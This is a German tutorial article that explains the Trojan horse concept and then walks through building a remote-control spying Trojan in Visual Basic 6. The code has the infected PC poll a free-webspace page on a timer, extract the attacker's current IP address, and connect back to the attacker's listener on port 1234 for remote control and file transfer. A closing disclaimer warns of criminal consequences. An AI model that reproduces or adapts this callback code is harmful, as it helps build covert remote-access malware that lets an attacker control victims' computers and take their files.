|
Home - Internet - Das Trojanische Pferd
Hinweis: Für den hier dargestellte Inhalt ist nicht der Betreiber der Plattform, sondern der jeweilige Autor verantwortlich. Falls Sie Missbrauch vermuten, bitten wir Sie, uns unter missbrauch@it-academy.cc zu kontaktieren. [Druckansicht] [Als E-Mail senden] [Kommentar verfassen] Das Trojanische Pferd Der Name "Trojanisches Pferd" oder kurz "Trojaner" kommt von einer griechischen Sage: Im Trojanischen Krieg eroberten die Griechen die Stadt Troja mit Hilfe eines hölzernen Pferdes, in dessen hohlem Bauch 30 Soldaten versteckt waren. Die Soldaten konnten Troja ganz einfach "von innen" her erobern. Der Computer-Trojaner arbeitet ähnlich: Das schädliche Programm wird in einen fremden PC eingeschleust, oftmals angehängt an nützliche Software. Es gibt verschiedene Sorten von Trojanern, manche richten einfach nur Schaden an wie z.B. Viren, andere benutzen Ihren PC als Waffe z.B. bei einem DoS-Angriff gegen Server (Denial of Service, es werden viele Anfragen gleichzeitig an einen Server geschickt, dieser kann die riesige Datenflut nicht verarbeiten und bricht zusammen). In diesem Artikel möchte ich mich mit Spionage-Fernsteuer-Trojanern befassen, d.h. der Trojaner, einmal auf Ihrem Computer installiert wird vom Hacker gesteuert und kann z.B. Dateien an ihn übertragen. Will man von einem normalen, privaten Internetanschluss aus einen anderen PC mit normalem, privatem Internetanschluss angreifen (normaler Internetanschluss: Einwahl mit Modem, ISDN oder DSL, keine Standleitung!) ergibt sich folgendes Problem:  Das Internet ist ein riesiges Netzwerk mit sehr vielen Computern, jeder Computer hat eine IP-Adresse, bei einem normalen, privaten Internetanschluss wird diese IP-Adresse bei jeder Einwahl neu vergeben. Wie finden Sie nun den PC, den Sie angreifen wollen?  Der Trojaner auf dem Opfer-PC fragt eine Internet-Seite von einem Server ab, auf diese Seite wurde vorher die aktuelle IP-Adresse des Angreifers geschrieben. Der Trojaner liest die Adresse und baut eine Verbindung auf. Wie lässt sich so ein Trojaner mit MS Visual Basic 6 verwirklichen? Starten Sie ein neues Projekt und klicken Sie auf das Menü Projekt, Komponenten. Fügen Sie das Steuerelement "Microsoft Winsock Control 6.0" (mswinsck.ocx) hinzu. If WinsockIP.State <> sckClosed Then WinsockIP.Close WinsockIP.RemoteHost = "fortunecity.de" WinsockIP.RemotePort = 80 WinsockIP.Connect In der ersten Zeile werden alle Verbindungen von diesem Winsock Steuerelement geschlossen, falls welche bestehen. Anschließend wird der Server bestimmt, hier "fortunecity.de" (dort gibt es kostenlosen Webspace) Es wird noch der Port auf Server-Seite festgelegt (Port 80 = Standard HTTP-Port, HyperTextTransferProtocol), dann wird versucht eine Verbindung aufzubauen. Schreiben Sie diesen Code in einen Timer und lassen Sie ihn vielleicht einmal pro Minute ausführen, falls der Benutzer des PC noch keine Internetverbindung aufgebaut hat, passiert nämlich nichts. Private Sub WinsockIP_Connect() Dim Cmd$, URL$ URL = "http://members.fortunecity.de/user_name/ip.html"; Cmd = "GET " & URL & " HTTP/1.0" & vbCrLf & "Accept: */*" & _ vbCrLf & "Accept: text/html" & vbCrLf & vbCrLf WinsockIP.SendData Cmd End Sub Diese Prozedur wird ausgeführt, wenn eine Verbindung hergestellt wurde. Es werden zuerst zwei Variablen eingeführt, URL ist die anzufordernde HTML-Seite, Cmd ist das gesamte Kommando, welches an den Server geschickt wird. Zum Schluss wird das fertig zusammen gesetzte Kommando an den Server gesendet. Private Sub WinsockIP_DataArrival(ByVal bytesTotal As Long) Dim data$ WinsockIP.GetData data, vbString ipText = ipText & data End Sub Wenn der Server Daten sendet, werden diese von dieser Prozedur in die Variable ipText geschrieben (die Variable ipText muss vorher ausserhalb von Prozeduren deklariert werden!). Private Sub WinsockIP_Close() Dim IP as String IP = Mid(ipText, InStr(1, ipText, "IP-Nummer:") + Len("IP-Nummer:"), 15) Do While Right(IP, 1) = "." IP = Left(IP, Len(IP) - 1) Loop If WinsockHack.State <> sckClosed Then WinsockHack.Close WinsockHack.RemoteHost = IP WinsockHack.RemotePort = 1234 WinsockHack.Connect End Sub Sobald die Übertragung der Seite abgeschlossen ist wird die Verbindung vom Server getrennt und diese Prozedur aufgerufen. Zuerst wird die Seite nach "IP-Nummer:" durchsucht, danach werden 15 Zeichen nach "IP-Nummer:" extrahiert. (15 Zeichen = 4 * 3 Ziffern + 3 Punkte) Da die IP-Adresse auch kürzer als 15 Zeichen sein kann, z. B. 127.0.0.1 habe ich in der HTML-Seite genügend Punkte angehängt, d.h. die Variable IP enthält jetzt z. B. "127.0.0.1......" Als nächstes werden alle angehängten Punkte abgeschnitten, so dass "IP" nur noch die korrekte IP-Adresse enthält. Zum Schluss baut WinsockHack eine Verbindung zur gerade gelesenen IP-Adresse zum Port 1234 auf (auf dem Angreifer-PC sollte das passende Fernsteuerprogramm laufen, welches den Port 1234 geöffnet hat und damit auf Verbindungen wartet. Disclaimer Zu beachten ist, dass durch Verwendung der hier gebotenen Informationen strafrechtliche Folgen entstehen können. Der Autor übernmmt keinerlei Haftung für die Verwendung und deren Folgen, der hier dargebotenen Informationen.
|
Autoren:03760
Artikel:00815 Glossar:04618 News:08554 Userbeiträge:16077 Queueeinträge:00024 
Unternehmensimage im Internet aufbauen
Hotels.com geht Offline DMSFACTORY erleichtert Implementierung von DMS über Skype [Mehr News] 
Ihre Anforderungen an ein Online-Zeiterfassungs-Produkt?
|
